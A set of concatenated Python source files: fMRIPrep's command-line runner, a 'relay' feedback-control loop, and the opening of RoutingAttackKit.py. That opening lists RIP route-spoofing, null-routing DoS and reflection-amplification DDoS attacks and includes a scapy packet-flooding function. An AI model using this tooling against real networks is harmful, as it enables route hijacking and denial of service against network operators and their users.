g_perfm.add_argument('--low-mem', action='store_true',
help='attempt to reduce memory usage (will increase disk usage '
'in working directory)')
g_perfm.add_argument('--use-plugin', action='store', default=None,
help='nipype plugin configuration file')
g_perfm.add_argument('--anat-only', action='store_true',
help='run anatomical workflows only')
g_perfm.add_argument('--boilerplate', action='store_true',
help='generate boilerplate only')
g_perfm.add_argument('--ignore-aroma-denoising-errors', action='store_true',
default=False,
help='ignores the errors ICA_AROMA returns when there '
'are no components classified as either noise or '
'signal')
g_perfm.add_argument("-v", "--verbose", dest="verbose_count", action="count", default=0,
help="increases log verbosity for each occurence, debug level is -vvv")
g_perfm.add_argument('--debug', action='store_true', default=False,
help='DEPRECATED - Does not do what you want.')
g_conf = parser.add_argument_group('Workflow configuration')
g_conf.add_argument(
'--ignore', required=False, action='store', nargs="+", default=[],
choices=['fieldmaps', 'slicetiming', 'sbref'],
help='ignore selected aspects of the input dataset to disable corresponding '
'parts of the workflow (a space delimited list)')
g_conf.add_argument(
'--longitudinal', action='store_true',
help='treat dataset as longitudinal - may increase runtime')
g_conf.add_argument(
'--t2s-coreg', action='store_true',
help='If provided with multi-echo BOLD dataset, create T2*-map and perform '
'T2*-driven coregistration. When multi-echo data is provided and this '
'option is not enabled, standard EPI-T1 coregistration is performed '
'using the middle echo.')
g_conf.add_argument('--bold2t1w-dof', action='store', default=6, choices=[6, 9, 12], type=int,
help='Degrees of freedom when registering BOLD to T1w images. '
'6 degrees (rotation and translation) are used by default.')
g_conf.add_argument(
'--output-space', required=False, action='store',
choices=['T1w', 'template', 'fsnative', 'fsaverage', 'fsaverage6', 'fsaverage5'],
nargs='+', default=['template', 'fsaverage5'],
help='volume and surface spaces to resample functional series into\n'
' - T1w: subject anatomical volume\n'
' - template: normalization target specified by --template\n'
' - fsnative: individual subject surface\n'
' - fsaverage*: FreeSurfer average meshes\n'
'this argument can be single value or a space delimited list,\n'
'for example: --output-space T1w fsnative'
)
g_conf.add_argument(
'--force-bbr', action='store_true', dest='use_bbr', default=None,
help='Always use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--force-no-bbr', action='store_false', dest='use_bbr', default=None,
help='Do not use boundary-based registration (no goodness-of-fit checks)')
g_conf.add_argument(
'--template', required=False, action='store',
choices=['MNI152NLin2009cAsym'], default='MNI152NLin2009cAsym',
help='volume template space (default: MNI152NLin2009cAsym)')
g_conf.add_argument(
'--output-grid-reference', required=False, action='store',
help='Deprecated after FMRIPREP 1.0.8. Please use --template-resampling-grid instead.')
g_conf.add_argument(
'--template-resampling-grid', required=False, action='store', default='native',
help='Keyword ("native", "1mm", or "2mm") or path to an existing file. '
'Allows to define a reference grid for the resampling of BOLD images in template '
'space. Keyword "native" will use the original BOLD grid as reference. '
'Keywords "1mm" and "2mm" will use the corresponding isotropic template '
'resolutions. If a path is given, the grid of that image will be used. '
'It determines the field of view and resolution of the output images, '
'but is not used in normalization.')
g_conf.add_argument(
'--medial-surface-nan', required=False, action='store_true', default=False,
help='Replace medial wall values with NaNs on functional GIFTI files. Only '
'performed for GIFTI files mapped to a freesurfer subject (fsaverage or fsnative).')
# ICA_AROMA options
g_aroma = parser.add_argument_group('Specific options for running ICA_AROMA')
g_aroma.add_argument('--use-aroma', action='store_true', default=False,
help='add ICA_AROMA to your preprocessing stream')
g_aroma.add_argument('--aroma-melodic-dimensionality', action='store',
default=-200, type=int,
help='Exact or maximum number of MELODIC components to estimate '
'(positive = exact, negative = maximum)')
# ANTs options
g_ants = parser.add_argument_group('Specific options for ANTs registrations')
g_ants.add_argument('--skull-strip-template', action='store', default='OASIS',
choices=['OASIS', 'NKI'],
help='select ANTs skull-stripping template (default: OASIS)')
g_ants.add_argument('--skull-strip-fixed-seed', action='store_true',
help='do not use a random seed for skull-stripping - will ensure '
'run-to-run replicability when used with --omp-nthreads 1')
# Fieldmap options
g_fmap = parser.add_argument_group('Specific options for handling fieldmaps')
g_fmap.add_argument('--fmap-bspline', action='store_true', default=False,
help='fit a B-Spline field using least-squares (experimental)')
g_fmap.add_argument('--fmap-no-demean', action='store_false', default=True,
help='do not remove median (within mask) from fieldmap')
# SyN-unwarp options
g_syn = parser.add_argument_group('Specific options for SyN distortion correction')
g_syn.add_argument('--use-syn-sdc', action='store_true', default=False,
help='EXPERIMENTAL: Use fieldmap-free distortion correction')
g_syn.add_argument('--force-syn', action='store_true', default=False,
help='EXPERIMENTAL/TEMPORARY: Use SyN correction in addition to '
'fieldmap correction, if available')
# FreeSurfer options
g_fs = parser.add_argument_group('Specific options for FreeSurfer preprocessing')
g_fs.add_argument(
'--fs-license-file', metavar='PATH', type=os.path.abspath,
help='Path to FreeSurfer license key file. Get it (for free) by registering'
' at https://surfer.nmr.mgh.harvard.edu/registration.html')
# Surface generation xor
g_surfs = parser.add_argument_group('Surface preprocessing options')
g_surfs.add_argument('--no-submm-recon', action='store_false', dest='hires',
help='disable sub-millimeter (hires) reconstruction')
g_surfs_xor = g_surfs.add_mutually_exclusive_group()
g_surfs_xor.add_argument('--cifti-output', action='store_true', default=False,
help='output BOLD files as CIFTI dtseries')
g_surfs_xor.add_argument('--fs-no-reconall', '--no-freesurfer',
action='store_false', dest='run_reconall',
help='disable FreeSurfer surface preprocessing.'
' Note : `--no-freesurfer` is deprecated and will be removed in 1.2.'
' Use `--fs-no-reconall` instead.')
g_other = parser.add_argument_group('Other options')
g_other.add_argument('-w', '--work-dir', action='store',
help='path where intermediate results should be stored')
g_other.add_argument(
'--resource-monitor', action='store_true', default=False,
help='enable Nipype\'s resource monitoring to keep track of memory and CPU usage')
g_other.add_argument(
'--reports-only', action='store_true', default=False,
help='only generate reports, don\'t run workflows. This will only rerun report '
'aggregation, not reportlet generation for specific nodes.')
g_other.add_argument(
'--run-uuid', action='store', default=None,
help='Specify UUID of previous run, to include error logs in report. '
'No effect without --reports-only.')
g_other.add_argument('--write-graph', action='store_true', default=False,
help='Write workflow graph.')
g_other.add_argument('--stop-on-first-crash', action='store_true', default=False,
help='Force stopping on first crash, even if a work directory'
' was specified.')
g_other.add_argument('--notrack', action='store_true', default=False,
help='Opt-out of sending tracking information of this run to '
'the FMRIPREP developers. This information helps to '
'improve FMRIPREP and provides an indicator of real '
'world usage crucial for obtaining funding.')
g_other.add_argument('--sloppy', action='store_true', default=False,
help='Use low-quality tools for speed - TESTING ONLY')
return parser
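# Illustrative invocation only (paths and labels are placeholders); the positional arguments
# follow the BIDS-Apps convention enforced above, assuming the package is installed with its
# usual "fmriprep" console script:
#
#   fmriprep /data/bids /data/out participant \
#       --participant-label 01 02 \
#       --output-space T1w template \
#       --fs-license-file /opt/freesurfer/license.txt \
#       --nthreads 8 --omp-nthreads 4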
def main():
"""Entry point"""
from nipype import logging as nlogging
from multiprocessing import set_start_method, Process, Manager
from ..viz.reports import generate_reports
from ..utils.bids import write_derivative_description
set_start_method('forkserver')
warnings.showwarning = _warn_redirect
opts = get_parser().parse_args()
exec_env = os.name
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
exec_env = 'singularity'
cgroup = Path('/proc/1/cgroup')
if cgroup.exists() and 'docker' in cgroup.read_text():
exec_env = 'docker'
if os.getenv('DOCKER_VERSION_8395080871'):
exec_env = 'fmriprep-docker'
sentry_sdk = None
if not opts.notrack:
import sentry_sdk
from ..__about__ import __version__
environment = "prod"
release = __version__
if not __version__:
environment = "dev"
release = "dev"
elif bool(int(os.getenv('FMRIPREP_DEV', 0))) or ('+' in __version__):
environment = "dev"
def before_send(event, hints):
# Filtering log messages about crashed nodes
if 'logentry' in event and 'message' in event['logentry']:
msg = event['logentry']['message']
if msg.startswith("could not run node:"):
return None
elif msg.startswith("Saving crash info to "):
return None
elif re.match("Node .+ failed to run on host .+", msg):
return None
if 'breadcrumbs' in event and isinstance(event['breadcrumbs'], list):
fingerprints_to_propagate = ['no-disk-space', 'memory-error', 'permission-denied',
'keyboard-interrupt']
for bc in event['breadcrumbs']:
msg = bc.get('message', 'empty-msg')
if msg in fingerprints_to_propagate:
event['fingerprint'] = [msg]
break
return event
sentry_sdk.init("https://d5a16b0c38d84d1584dfc93b9fb1ade6@sentry.io/1137693",
release=release,
environment=environment,
before_send=before_send)
with sentry_sdk.configure_scope() as scope:
scope.set_tag('exec_env', exec_env)
if exec_env == 'fmriprep-docker':
scope.set_tag('docker_version', os.getenv('DOCKER_VERSION_8395080871'))
free_mem_at_start = round(psutil.virtual_memory().free / 1024**3, 1)
scope.set_tag('free_mem_at_start', free_mem_at_start)
scope.set_tag('cpu_count', cpu_count())
# Memory policy may have a large effect on types of errors experienced
overcommit_memory = Path('/proc/sys/vm/overcommit_memory')
if overcommit_memory.exists():
policy = {'0': 'heuristic',
'1': 'always',
'2': 'never'}.get(overcommit_memory.read_text().strip(), 'unknown')
scope.set_tag('overcommit_memory', policy)
if policy == 'never':
overcommit_kbytes = Path('/proc/sys/vm/overcommit_kbytes')
kb = overcommit_kbytes.read_text().strip()
if kb != '0':
limit = '{}kB'.format(kb)
else:
overcommit_ratio = Path('/proc/sys/vm/overcommit_ratio')
limit = '{}%'.format(overcommit_ratio.read_text().strip())
scope.set_tag('overcommit_limit', limit)
else:
scope.set_tag('overcommit_limit', 'n/a')
else:
scope.set_tag('overcommit_memory', 'n/a')
scope.set_tag('overcommit_limit', 'n/a')
for k, v in vars(opts).items():
scope.set_tag(k, v)
# Validate inputs
if not opts.skip_bids_validation:
print("Making sure the input data is BIDS compliant (warnings can be ignored in most "
"cases).")
validate_input_dir(exec_env, opts.bids_dir, opts.participant_label)
# FreeSurfer license
default_license = str(Path(os.getenv('FREESURFER_HOME')) / 'license.txt')
# Precedence: --fs-license-file, $FS_LICENSE, default_license
license_file = opts.fs_license_file or os.getenv('FS_LICENSE', default_license)
if not os.path.exists(license_file):
raise RuntimeError(
'ERROR: a valid license file is required for FreeSurfer to run. '
'FMRIPREP looked for an existing license file at several paths, in this '
'order: 1) command line argument ``--fs-license-file``; 2) ``$FS_LICENSE`` '
'environment variable; and 3) the ``$FREESURFER_HOME/license.txt`` path. '
'Get it (for free) by registering at https://'
'surfer.nmr.mgh.harvard.edu/registration.html')
os.environ['FS_LICENSE'] = license_file
# Retrieve logging level
log_level = int(max(25 - 5 * opts.verbose_count, logging.DEBUG))
# Set logging
logger.setLevel(log_level)
nlogging.getLogger('nipype.workflow').setLevel(log_level)
nlogging.getLogger('nipype.interface').setLevel(log_level)
nlogging.getLogger('nipype.utils').setLevel(log_level)
errno = 0
# Call build_workflow(opts, retval)
with Manager() as mgr:
retval = mgr.dict()
p = Process(target=build_workflow, args=(opts, retval))
p.start()
p.join()
if p.exitcode != 0:
sys.exit(p.exitcode)
fmriprep_wf = retval['workflow']
plugin_settings = retval['plugin_settings']
bids_dir = retval['bids_dir']
output_dir = retval['output_dir']
work_dir = retval['work_dir']
subject_list = retval['subject_list']
run_uuid = retval['run_uuid']
if not opts.notrack:
with sentry_sdk.configure_scope() as scope:
scope.set_tag('run_uuid', run_uuid)
scope.set_tag('npart', len(subject_list))
retcode = retval['return_code']
if fmriprep_wf is None:
sys.exit(1)
if opts.write_graph:
fmriprep_wf.write_graph(graph2use="colored", format='svg', simple_form=True)
if opts.reports_only:
sys.exit(int(retcode > 0))
if opts.boilerplate:
sys.exit(int(retcode > 0))
# Sentry tracking
if not opts.notrack:
sentry_sdk.add_breadcrumb(message='fMRIPrep started', level='info')
sentry_sdk.capture_message('fMRIPrep started', level='info')
# Check workflow for missing commands
missing = check_deps(fmriprep_wf)
if missing:
print("Cannot run fMRIPrep. Missing dependencies:")
for iface, cmd in missing:
print("\t{} (Interface: {})".format(cmd, iface))
sys.exit(2)
# Clean up master process before running workflow, which may create forks
gc.collect()
try:
fmriprep_wf.run(**plugin_settings)
except RuntimeError as e:
errno = 1
if "Workflow did not execute cleanly" not in str(e):
sentry_sdk.capture_exception(e)
raise
finally:
# Generate reports phase
errno += generate_reports(subject_list, output_dir, work_dir, run_uuid,
sentry_sdk=sentry_sdk)
write_derivative_description(bids_dir, str(Path(output_dir) / 'fmriprep'))
if not opts.notrack and errno == 0:
sentry_sdk.capture_message('fMRIPrep finished without errors', level='info')
sys.exit(int(errno > 0))
def validate_input_dir(exec_env, bids_dir, participant_label):
# Ignore issues and warnings that should not influence FMRIPREP
validator_config_dict = {
"ignore": [
"EVENTS_COLUMN_ONSET",
"EVENTS_COLUMN_DURATION",
"TSV_EQUAL_ROWS",
"TSV_EMPTY_CELL",
"TSV_IMPROPER_NA",
"VOLUME_COUNT_MISMATCH",
"BVAL_MULTIPLE_ROWS",
"BVEC_NUMBER_ROWS",
"DWI_MISSING_BVAL",
"INCONSISTENT_SUBJECTS",
"INCONSISTENT_PARAMETERS",
"BVEC_ROW_LENGTH",
"B_FILE",
"PARTICIPANT_ID_COLUMN",
"PARTICIPANT_ID_MISMATCH",
"TASK_NAME_MUST_DEFINE",
"PHENOTYPE_SUBJECTS_MISSING",
"STIMULUS_FILE_MISSING",
"DWI_MISSING_BVEC",
"EVENTS_TSV_MISSING",
"TSV_IMPROPER_NA",
"ACQTIME_FMT",
"Participants age 89 or higher",
"DATASET_DESCRIPTION_JSON_MISSING",
"FILENAME_COLUMN",
"WRONG_NEW_LINE",
"MISSING_TSV_COLUMN_CHANNELS",
"MISSING_TSV_COLUMN_IEEG_CHANNELS",
"MISSING_TSV_COLUMN_IEEG_ELECTRODES",
"UNUSED_STIMULUS",
"CHANNELS_COLUMN_SFREQ",
"CHANNELS_COLUMN_LOWCUT",
"CHANNELS_COLUMN_HIGHCUT",
"CHANNELS_COLUMN_NOTCH",
"CUSTOM_COLUMN_WITHOUT_DESCRIPTION",
"ACQTIME_FMT",
"SUSPICIOUSLY_LONG_EVENT_DESIGN",
"SUSPICIOUSLY_SHORT_EVENT_DESIGN",
"MALFORMED_BVEC",
"MALFORMED_BVAL",
"MISSING_TSV_COLUMN_EEG_ELECTRODES",
"MISSING_SESSION"
],
"error": ["NO_T1W"],
"ignoredFiles": ['/dataset_description.json', '/participants.tsv']
}
# Limit validation only to data from requested participants
if participant_label:
all_subs = set([os.path.basename(i)[4:] for i in glob(os.path.join(bids_dir,
"sub-*"))])
selected_subs = []
for selected_sub in participant_label:
if selected_sub.startswith("sub-"):
selected_subs.append(selected_sub[4:])
else:
selected_subs.append(selected_sub)
selected_subs = set(selected_subs)
bad_labels = selected_subs.difference(all_subs)
if bad_labels:
error_msg = 'Data for requested participant(s) label(s) not found. Could ' \
'not find data for participant(s): %s. Please verify the requested ' \
'participant labels.'
if exec_env == 'docker':
error_msg += ' This error can be caused by the input data not being ' \
'accessible inside the docker container. Please make sure all ' \
'volumes are mounted properly (see https://docs.docker.com/' \
'engine/reference/commandline/run/#mount-volume--v---read-only)'
if exec_env == 'singularity':
error_msg += ' This error can be caused by the input data not being ' \
'accessible inside the singularity container. Please make sure ' \
'all paths are mapped properly (see https://www.sylabs.io/' \
'guides/3.0/user-guide/bind_paths_and_mounts.html)'
raise RuntimeError(error_msg % ','.join(bad_labels))
ignored_subs = all_subs.difference(selected_subs)
if ignored_subs:
for sub in ignored_subs:
validator_config_dict["ignoredFiles"].append("/sub-%s/**" % sub)
with tempfile.NamedTemporaryFile('w+') as temp:
temp.write(json.dumps(validator_config_dict))
temp.flush()
try:
subprocess.check_call(['bids-validator', bids_dir, '-c', temp.name])
except FileNotFoundError:
logger.error("bids-validator does not appear to be installed")
def build_workflow(opts, retval):
"""
Create the Nipype Workflow that supports the whole execution
graph, given the inputs.
All the checks and the construction of the workflow are done
inside this function that has pickleable inputs and output
dictionary (``retval``) to allow isolation using a
``multiprocessing.Process`` that allows fmriprep to enforce
a hard-limited memory-scope.
"""
from subprocess import check_call, CalledProcessError, TimeoutExpired
from pkg_resources import resource_filename as pkgrf
from shutil import copyfile
from nipype import logging, config as ncfg
from niworkflows.utils.bids import collect_participants
from ..__about__ import __version__
from ..workflows.base import init_fmriprep_wf
from ..viz.reports import generate_reports
logger = logging.getLogger('nipype.workflow')
INIT_MSG = """
Running fMRIPREP version {version}:
* BIDS dataset path: {bids_dir}.
* Participant list: {subject_list}.
* Run identifier: {uuid}.
""".format
output_spaces = opts.output_space or []
# Validity of some inputs
# ERROR check if use_aroma was specified, but the correct template was not
if opts.use_aroma and (opts.template != 'MNI152NLin2009cAsym' or
'template' not in output_spaces):
output_spaces.append('template')
logger.warning(
'Option "--use-aroma" requires functional images to be resampled to MNI space. '
'The argument "template" has been automatically added to the list of output '
'spaces (option "--output-space").'
)
# Check output_space
if 'template' not in output_spaces and (opts.use_syn_sdc or opts.force_syn):
msg = ['SyN SDC correction requires T1 to MNI registration, but '
'"template" is not specified in "--output-space" arguments.',
'Option --use-syn will be cowardly dismissed.']
if opts.force_syn:
output_spaces.append('template')
msg[1] = (' Since --force-syn has been requested, "template" has been added to'
' the "--output-space" list.')
logger.warning(' '.join(msg))
# Set up some instrumental utilities
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid.uuid4())
# First check that bids_dir looks like a BIDS folder
bids_dir = os.path.abspath(opts.bids_dir)
subject_list = collect_participants(
bids_dir, participant_label=opts.participant_label)
# Load base plugin_settings from file if --use-plugin
if opts.use_plugin is not None:
from yaml import load as loadyml
with open(opts.use_plugin) as f:
plugin_settings = loadyml(f)
plugin_settings.setdefault('plugin_args', {})
else:
# Defaults
plugin_settings = {
'plugin': 'MultiProc',
'plugin_args': {
'raise_insufficient': False,
'maxtasksperchild': 1,
}
}
# Resource management options
# Note that we're making strong assumptions about valid plugin args
# This may need to be revisited if people try to use batch plugins
nthreads = plugin_settings['plugin_args'].get('n_procs')
# Permit overriding plugin config with specific CLI options
if nthreads is None or opts.nthreads is not None:
nthreads = opts.nthreads
if nthreads is None or nthreads < 1:
nthreads = cpu_count()
plugin_settings['plugin_args']['n_procs'] = nthreads
if opts.mem_mb:
plugin_settings['plugin_args']['memory_gb'] = opts.mem_mb / 1024
omp_nthreads = opts.omp_nthreads
if omp_nthreads == 0:
omp_nthreads = min(nthreads - 1 if nthreads > 1 else cpu_count(), 8)
if 1 < nthreads < omp_nthreads:
logger.warning(
'Per-process threads (--omp-nthreads=%d) exceed total '
'threads (--nthreads/--n_cpus=%d)', omp_nthreads, nthreads)
# Set up directories
output_dir = op.abspath(opts.output_dir)
log_dir = op.join(output_dir, 'fmriprep', 'logs')
work_dir = op.abspath(opts.work_dir or 'work') # Set work/ as default
# Check and create output and working directories
os.makedirs(output_dir, exist_ok=True)
os.makedirs(log_dir, exist_ok=True)
os.makedirs(work_dir, exist_ok=True)
# Nipype config (logs and execution)
ncfg.update_config({
'logging': {
'log_directory': log_dir,
'log_to_file': True
},
'execution': {
'crashdump_dir': log_dir,
'crashfile_format': 'txt',
'get_linked_libs': False,
'stop_on_first_crash': opts.stop_on_first_crash or opts.work_dir is None,
},
'monitoring': {
'enabled': opts.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
if opts.resource_monitor:
ncfg.enable_resource_monitor()
retval['return_code'] = 0
retval['plugin_settings'] = plugin_settings
retval['bids_dir'] = bids_dir
retval['output_dir'] = output_dir
retval['work_dir'] = work_dir
retval['subject_list'] = subject_list
retval['run_uuid'] = run_uuid
retval['workflow'] = None
# Called with reports only
if opts.reports_only:
logger.log(25, 'Running --reports-only on participants %s', ', '.join(subject_list))
if opts.run_uuid is not None:
run_uuid = opts.run_uuid
retval['return_code'] = generate_reports(subject_list, output_dir, work_dir, run_uuid)
return retval
# Build main workflow
logger.log(25, INIT_MSG(
version=__version__,
bids_dir=bids_dir,
subject_list=subject_list,
uuid=run_uuid)
)
template_out_grid = opts.template_resampling_grid
if opts.output_grid_reference is not None:
logger.warning(
'Option --output-grid-reference is deprecated, please use '
'--template-resampling-grid')
template_out_grid = template_out_grid or opts.output_grid_reference
if opts.debug:
logger.warning('Option --debug is deprecated and has no effect')
retval['workflow'] = init_fmriprep_wf(
subject_list=subject_list,
task_id=opts.task_id,
echo_idx=opts.echo_idx,
run_uuid=run_uuid,
ignore=opts.ignore,
debug=opts.sloppy,
low_mem=opts.low_mem,
anat_only=opts.anat_only,
longitudinal=opts.longitudinal,
t2s_coreg=opts.t2s_coreg,
omp_nthreads=omp_nthreads,
skull_strip_template=opts.skull_strip_template,
skull_strip_fixed_seed=opts.skull_strip_fixed_seed,
work_dir=work_dir,
output_dir=output_dir,
bids_dir=bids_dir,
freesurfer=opts.run_reconall,
output_spaces=output_spaces,
template=opts.template,
medial_surface_nan=opts.medial_surface_nan,
cifti_output=opts.cifti_output,
template_out_grid=template_out_grid,
hires=opts.hires,
use_bbr=opts.use_bbr,
bold2t1w_dof=opts.bold2t1w_dof,
fmap_bspline=opts.fmap_bspline,
fmap_demean=opts.fmap_no_demean,
use_syn=opts.use_syn_sdc,
force_syn=opts.force_syn,
use_aroma=opts.use_aroma,
aroma_melodic_dim=opts.aroma_melodic_dimensionality,
ignore_aroma_err=opts.ignore_aroma_denoising_errors,
)
retval['return_code'] = 0
logs_path = Path(output_dir) / 'fmriprep' / 'logs'
boilerplate = retval['workflow'].visit_desc()
if boilerplate:
(logs_path / 'CITATION.md').write_text(boilerplate)
logger.log(25, 'Works derived from this fMRIPrep execution should '
'include the following boilerplate:\n\n%s', boilerplate)
# Generate HTML file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('fmriprep', 'data/boilerplate.bib'),
'--filter', 'pandoc-citeproc',
str(logs_path / 'CITATION.md'),
'-o', str(logs_path / 'CITATION.html')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.html file:\n%s',
' '.join(cmd))
# Generate LaTex file resolving citations
cmd = ['pandoc', '-s', '--bibliography',
pkgrf('fmriprep', 'data/boilerplate.bib'),
'--natbib', str(logs_path / 'CITATION.md'),
'-o', str(logs_path / 'CITATION.tex')]
try:
check_call(cmd, timeout=10)
except (FileNotFoundError, CalledProcessError, TimeoutExpired):
logger.warning('Could not generate CITATION.tex file:\n%s',
' '.join(cmd))
else:
copyfile(pkgrf('fmriprep', 'data/boilerplate.bib'),
(logs_path / 'CITATION.bib'))
return retval
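# Illustrative sketch (hedged, not taken verbatim from fmriprep): because build_workflow()
# takes pickleable inputs and writes its results into the ``retval`` dictionary, it can be
# isolated in a separate process as the docstring above describes. ``opts`` is assumed to
# come from the CLI argument parser.
#
#     from multiprocessing import Manager, Process
#     with Manager() as mgr:
#         retval = mgr.dict()
#         proc = Process(target=build_workflow, args=(opts, retval))
#         proc.start()
#         proc.join()
#         workflow = retval.get('workflow')
#         plugin_settings = retval.get('plugin_settings')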
if __name__ == '__main__':
raise RuntimeError("fmriprep/cli/run.py should not be run directly;\n"
"Please `pip install` fmriprep and use the `fmriprep` command")
|
runner.py
|
from __future__ import division
from collections import deque
import numpy as np
import os
from os.path import abspath, dirname, join
import subprocess
import sys
import time
import threading
from relay import log, configure_logging, add_zmq_log_handler
from relay import util
from relay import argparse_shared as at
def start_webui():
cwd = join(dirname(dirname(abspath(__file__))), 'web/src')
log.info("Starting node.js webui in a subshell")
subprocess.Popen(
'cd %s ; node index.js' % cwd, shell=True,
preexec_fn=os.setsid) # guarantee that the child process exits with me
@util.coroutine
def window(n, initial_data=()):
win = deque(initial_data, n)
while 1:
win.append((yield win))
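# Usage sketch (illustrative): ``window`` is primed by the ``util.coroutine`` decorator, so
# callers simply send values and receive back the rolling deque of the last ``n`` items, e.g.
# ``errhist = window(5)`` followed by ``errdata = errhist.send(err)``, as done in main() below.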
def calc_weight(errdata):
sp = np.fft.fft(errdata)[1: len(errdata) // 2]
if sp.sum() == 0: # there is no variation in the signal
log.warn('no variation in the signal. fft cannot continue')
return 1
# get the phase in radians # -np.pi < phase <= +np.pi
phase = np.angle(sp) # radians
# find the amplitude integral of neighboring samples.
# search <360 degrees to left of most recent sample's phase
# p_k = phase - degrees_between_samples * k # kth phase
amplitude_integrals = np.abs(np.sin(phase)) # iteratively updated
# samples per cycle
kth = len(errdata) / np.arange(1, len(errdata) // 2)
num_degrees_between_samples = 2 * np.pi / kth
p_k = phase.copy()
while (kth > 0).any():
# find amplitude of a sign wave at specific phase
p_k -= num_degrees_between_samples
amplitude_integrals += np.abs(np.sin(p_k))
kth -= 1
idxs = kth > 0
not_idxs = ~idxs
kth[not_idxs] = 0
p_k[not_idxs] = 0
num_degrees_between_samples[not_idxs] = 0
# get the amplitude of each frequency in the fft spectrum
amplitude = np.abs(sp)
return (
# np.sin(phase)
(np.sin(phase) / amplitude_integrals)
* (amplitude / amplitude.sum())
).sum()
def create_ramp_plan(err, ramp):
"""
Formulate and execute on a plan to slowly add heat or cooling to the system
`err` initial error (PV - SP)
`ramp` the size of the ramp
A ramp plan might yield MVs in this order at every timestep:
[5, 0, 4, 0, 3, 0, 2, 0, 1]
where err == 5 + 4 + 3 + 2 + 1
"""
if ramp == 1: # basecase
yield int(err)
while True:
yield 0
# np.arange(n).sum() == err
# --> solve for n
    # err = (n - 1) * (n / 2) == .5 * n**2 - .5 * n
    # 0 = .5 * n**2 - .5 * n - err --> solve for n
    n = np.abs(np.roots([.5, -.5, -abs(err)]).max())
niter = int(ramp // (2 * n)) # 2 means add all MV in first half of ramp
MV = n
log.info('Initializing a ramp plan', extra=dict(
ramp_size=ramp, err=err, niter=niter))
for x in range(int(n)):
budget = MV
for x in range(niter):
budget -= MV // niter
yield int(np.sign(err) * (MV // niter))
yield int(budget * np.sign(err))
MV -= 1
while True:
yield 0
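# Usage sketch (illustrative): the plan is a generator consumed one value per timestep,
# mirroring main() below:
#
#     plan = create_ramp_plan(err, ns.ramp)
#     MV = next(plan)   # first adjustment of the ramp
#     MV = next(plan)   # next timestep; the plan yields 0 forever once the ramp is spent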
def validate_ns_or_sysexit(ns):
ex = 0
if None in [ns.target, ns.metric]:
log.error("you must define a --metric and --target!")
ex = 1
if ns.warmer is None and ns.cooler is None:
log.error("you must define either a --warmer or a --cooler!")
ex = 1
if ex:
build_arg_parser().print_usage()
sys.exit(1)
def evaluate_stop_condition(errdata, stop_condition):
"""
Call the user-defined function: stop_condition(errdata)
If the function returns -1, do nothing. Otherwise, sys.exit.
"""
if stop_condition:
return_code = stop_condition(list(errdata))
if return_code != -1:
log.info(
'Stop condition triggered! Relay is terminating.',
extra=dict(return_code=return_code))
sys.exit(return_code)
def main(ns):
validate_ns_or_sysexit(ns)
configure_logging(True)
if ns.sendstats:
if ns.sendstats == 'webui':
add_zmq_log_handler('ipc:///tmp/relaylog')
start_webui()
else:
add_zmq_log_handler(ns.sendstats)
log.info(
"Starting relay!", extra={k: str(v) for k, v in ns.__dict__.items()})
metric = ns.metric()
target = ns.target()
errhist = window(ns.lookback)
ramp_index = 0
while True:
SP = next(target) # set point
PV = next(metric) # process variable
err = (SP - PV)
log.debug('got metric value', extra=dict(PV=PV, SP=SP))
if ramp_index < ns.ramp:
if ramp_index == 0:
plan = create_ramp_plan(err, ns.ramp)
ramp_index += 1
MV = next(plan)
errdata = errhist.send(0)
else:
errdata = errhist.send(err)
weight = calc_weight(errdata)
MV = int(round(err - weight * sum(errdata) / len(errdata)))
log.info('data', extra=dict(data=[
err, weight,
sum(errdata) / len(errdata)]))
if MV > 0:
if ns.warmer:
log.debug('adding heat', extra=dict(MV=MV, err=err))
threading.Thread(target=ns.warmer, args=(MV,)).start()
else:
log.warn('too cold')
elif MV < 0:
if ns.cooler:
log.debug('removing heat', extra=dict(MV=MV, err=err))
threading.Thread(target=ns.cooler, args=(MV,)).start()
else:
log.warn('too hot')
else:
log.debug(
'stabilized PV at setpoint', extra=dict(MV=MV, PV=PV, SP=SP))
time.sleep(ns.delay)
evaluate_stop_condition(list(errdata), ns.stop_condition)
build_arg_parser = at.build_arg_parser([
at.group(
"What is Relay optimizing?",
at.metric, at.target),
at.group(
"Instruct Relay how to heat or cool your metric",
at.warmer, at.cooler),
at.group(
"Some optional Relay parameters",
at.delay, at.lookback, at.ramp, at.sendstats, at.stop_condition),
])
|
RoutingAttackKit.py
|
#!/usr/bin/python
#
# Currently implemented attacks:
# - sniffer - (NOT YET IMPLEMENTED) Sniffer hunting for authentication strings
# - ripv1-route - Spoofed RIPv1 Route Announcements
# - ripv1-dos - RIPv1 Denial of Service via Null-Routing
# - ripv1-ampl - RIPv1 Reflection Amplification DDoS
# - ripv2-route - Spoofed RIPv2 Route Announcements
# - ripv2-dos - RIPv2 Denial of Service via Null-Routing
# - rip-fuzzer - RIPv1/RIPv2 protocol fuzzer, covering RIPAuth and RIPEntry structures fuzzing
#
# Python requirements:
# - scapy
#
# Mariusz B. / mgeeky, '19, <mb@binary-offensive.com>
#
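# Example invocation (illustrative; see parseOptions() below for the full flag list):
#
#   sudo ./RoutingAttackKit.py -t list                  # list implemented attacks
#   sudo ./RoutingAttackKit.py -t ripv2-route -i eth0 \
#        -a 10.0.0.0 -b 255.0.0.0 -c 192.168.1.200 -m 1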
import os
import sys
import time
import socket
import fcntl
import struct
import string
import random
import commands
import argparse
import multiprocessing
try:
from scapy.all import *
except ImportError:
print('[!] Scapy required: pip install scapy')
sys.exit(1)
VERSION = '0.1'
config = {
'verbose' : False,
'debug' : False,
'delay' : 1.0,
'interface': None,
'processors' : 8,
'network': '',
'spoof': '',
'nexthop': '',
'netmask': '',
'metric': 0,
'auth-type': '',
'auth-data': '',
}
attacks = {}
stopThreads = False
#
# ===============================================
#
def flooder(num, packets):
Logger.dbg('Starting task: {}, packets num: {}'.format(num, len(packets)))
for p in packets:
if stopThreads: break
try:
if stopThreads:
raise KeyboardInterrupt
sendp(p, verbose = False)
if len(p) < 1500:
Logger.dbg("Sent: \n" + str(p))
except KeyboardInterrupt:
break
except Exception as e:
pass
Logger.dbg('Stopping task: {}'.format(num))
class Logger:
@staticmethod
def _out(x):
